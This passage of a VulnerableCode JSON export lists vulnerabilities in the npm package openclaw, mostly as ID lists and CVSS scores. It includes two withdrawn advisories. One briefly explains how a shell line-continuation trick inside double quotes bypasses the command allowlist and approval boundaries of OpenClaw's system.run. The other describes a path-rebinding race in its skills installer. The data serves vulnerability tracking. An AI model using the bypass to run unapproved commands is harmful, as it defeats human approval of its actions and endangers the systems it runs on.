ulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-35659","GHSA-rvqr-hrcc-j9vv"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-s4s8-8qea-q3fd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90955?format=json","vulnerability_id":"VCID-sddn-scg8-kqab","summary":"Duplicate Advisory: OpenClaw's system.run allowlist bypass via shell line-continuation command substitution\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-9868-vxmx-w862. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.2.22 contain an allowlist bypass vulnerability in system.run that allows attackers to execute non-allowlisted commands by splitting command substitution using shell line-continuation characters. Attackers can bypass security analysis by injecting $\\\\ followed by a newline and opening parenthesis inside double quotes, causing the shell to fold the line continuation into executable command substitution that circumvents approval boundaries.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/3f0b9dbb36c86e308267924c0d3d4a4e1fc4d1e9","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/3f0b9dbb36c86e308267924c0d3d4a4e1fc4d1e9"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-allowlist-bypass-via-shell-line-continuation-command-substitution-in-system-run","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-allowlist-bypass-via-shell-line-continuation-command-substitution-in-system-run"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28460","reference_id":"CVE-2026-28460","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28460"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9868-vxmx-w862","reference_id":"GHSA-9868-vxmx-w862","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9868-vxmx-w862"},{"reference_url":"https://github.com/advisories/GHSA-xrgv-34cc-q765","reference_id":"GHSA-xrgv-34cc-q765","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xrgv-34cc-q765"}],"fixed_packages":[],"aliases":["GHSA-xrgv-34cc-q765"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-sddn-scg8-kqab"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91837?format=json","vulnerability_id":"VCID-sh4x-nq7t-ykgg","summary":"Duplicate Advisory: OpenClaw's skills-install-download can be redirected outside the tools root by rebinding the validated base path\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-vhwf-4x96-vqx2. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.8 contains a path traversal vulnerability in the skills download installer that validates the tools root lexically but reuses the mutable path during archive download and copy operations. A local attacker can rebind the tools-root path between validation and final write to redirect the installer outside the intended tools directory.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/9abf014f3502009faf9c73df5ca2cff719e54639","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/9abf014f3502009faf9c73df5ca2cff719e54639"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-path-traversal-via-tools-root-rebinding-in-skills-download","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-path-traversal-via-tools-root-rebinding-in-skills-download"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33574","reference_id":"CVE-2026-33574","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33574"},{"reference_url":"https://github.com/advisories/GHSA-6q2v-vfwp-pvwh","reference_id":"GHSA-6q2v-vfwp-pvwh","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6q2v-vfwp-pvwh"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vhwf-4x96-vqx2","reference_id":"GHSA-vhwf-4x96-vqx2","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vhwf-4x96-vqx2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74859?format=json","purl":"pkg:npm/openclaw@2026.3.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-54mc-t5s7-wyes"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkjm-wcmt-43br"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf